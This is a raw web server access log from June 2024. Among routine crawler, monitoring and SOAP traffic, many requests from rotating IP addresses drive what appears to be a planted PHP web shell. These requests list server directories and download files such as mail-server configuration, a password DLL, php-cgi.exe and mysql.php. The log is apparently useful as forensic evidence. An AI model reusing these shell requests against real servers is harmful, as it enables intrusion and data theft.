47.128.50.110 - - [19/Jun/2024:03:25:26 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CMercuryMail&f=POP3.PRO&ft=download HTTP/1.1" 200 81
168.119.49.52 - - [19/Jun/2024:03:25:28 -0500] "GET / HTTP/1.1" 200 4720
201.245.192.253 - - [19/Jun/2024:03:25:33 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [19/Jun/2024:03:25:40 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d61d0d9576dbc541fdbee5a484bc6a3672.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
176.9.137.113 - - [19/Jun/2024:03:25:44 -0500] "GET /php/PlanDesarrollo/MANUAL%20REPROGRAMACION%20Y%20ACTUALIZACION%20ENERO%202010.pdf HTTP/1.1" 404 1018
47.128.42.49 - - [19/Jun/2024:03:25:49 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=C%3A%5CExtranet%5Cphp&f=php-cgi.exe&ft=download HTTP/1.1" 200 45113
47.128.44.63 - - [19/Jun/2024:03:26:12 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CMercuryMail%5CRESOURCE%5C&f=ppass32.dll&ft=download HTTP/1.1" 200 58368
172.22.2.4 - - [19/Jun/2024:03:24:38 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [19/Jun/2024:03:26:19 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62ce8354ab2c04ae981fa8f2fd69b26f6.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [19/Jun/2024:03:26:33 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.36.72 - - [19/Jun/2024:03:26:34 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=ls&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2009&sort=0a HTTP/1.1" 200 91230
47.128.44.45 - - [19/Jun/2024:03:27:00 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cxampp%5Cxampp%5Cwebdav&f=x32.php&ft=download HTTP/1.1" 200 383
172.22.2.4 - - [19/Jun/2024:03:25:29 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59967
47.128.61.41 - - [19/Jun/2024:03:27:20 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cxampp%5Cxampp%5C&f=readme_de.txt&ft=download HTTP/1.1" 200 6939
216.245.221.92 - - [19/Jun/2024:03:27:32 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [19/Jun/2024:03:27:33 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [19/Jun/2024:03:27:40 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d61d0d9576dbc541fdbee5a484bc6a3672.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
47.128.25.100 - - [19/Jun/2024:03:27:42 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cxampp%5Cxampp%5Ctmp&f=ib9746.tmp&ft=download HTTP/1.1" 200 -
201.245.192.253 - - [19/Jun/2024:03:27:44 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 33866
201.245.192.253 - - [19/Jun/2024:03:27:44 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 33759
47.128.125.243 - - [19/Jun/2024:03:28:05 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Cxampp&f=mysql.php&ft=download HTTP/1.1" 200 103
201.245.192.253 - - [19/Jun/2024:03:28:19 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62ce8354ab2c04ae981fa8f2fd69b26f6.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [19/Jun/2024:03:28:25 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 36347
156.59.198.136 - - [19/Jun/2024:03:28:28 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_sess_610f9djs8jemap9d6qn26tg4n3 HTTP/1.0" 200 1034
201.245.192.253 - - [19/Jun/2024:03:28:33 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.79.97 - - [19/Jun/2024:03:28:40 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202013/1626.pdf HTTP/1.1" 200 595328
156.59.198.136 - - [19/Jun/2024:03:28:51 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_sess_ibv147b0jr1qs5722t2kktnkn7 HTTP/1.0" 200 1034
40.77.167.25 - - [19/Jun/2024:03:29:13 -0500] "GET /BLA/resoluciones/AUTOS%202023/4197.pdf HTTP/1.1" 200 435226
47.128.125.203 - - [19/Jun/2024:03:29:14 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Crdc%5C&f=bootstrap.min.css&ft=notepad HTTP/1.1" 200 102080
201.245.192.253 - - [19/Jun/2024:03:29:33 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.125.206 - - [19/Jun/2024:03:29:37 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccalculadora2%5C&f=ajax_calculadora.js&ft=download HTTP/1.1" 200 1594
201.245.192.253 - - [19/Jun/2024:03:29:40 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d61d0d9576dbc541fdbee5a484bc6a3672.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [19/Jun/2024:03:30:19 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62ce8354ab2c04ae981fa8f2fd69b26f6.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [19/Jun/2024:03:30:33 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [19/Jun/2024:03:29:45 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 14506
201.245.192.253 - - [19/Jun/2024:03:30:45 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 33759
201.245.192.253 - - [19/Jun/2024:03:31:33 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [19/Jun/2024:03:31:40 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d61d0d9576dbc541fdbee5a484bc6a3672.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
172.22.2.4 - - [19/Jun/2024:03:30:28 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [19/Jun/2024:03:32:19 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62ce8354ab2c04ae981fa8f2fd69b26f6.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.245.221.92 - - [19/Jun/2024:03:32:32 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [19/Jun/2024:03:32:33 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [19/Jun/2024:03:31:19 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59967
201.245.192.253 - - [19/Jun/2024:03:33:25 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 36347
201.245.192.253 - - [19/Jun/2024:03:33:33 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [19/Jun/2024:03:33:40 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d61d0d9576dbc541fdbee5a484bc6a3672.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [19/Jun/2024:03:34:19 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62ce8354ab2c04ae981fa8f2fd69b26f6.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
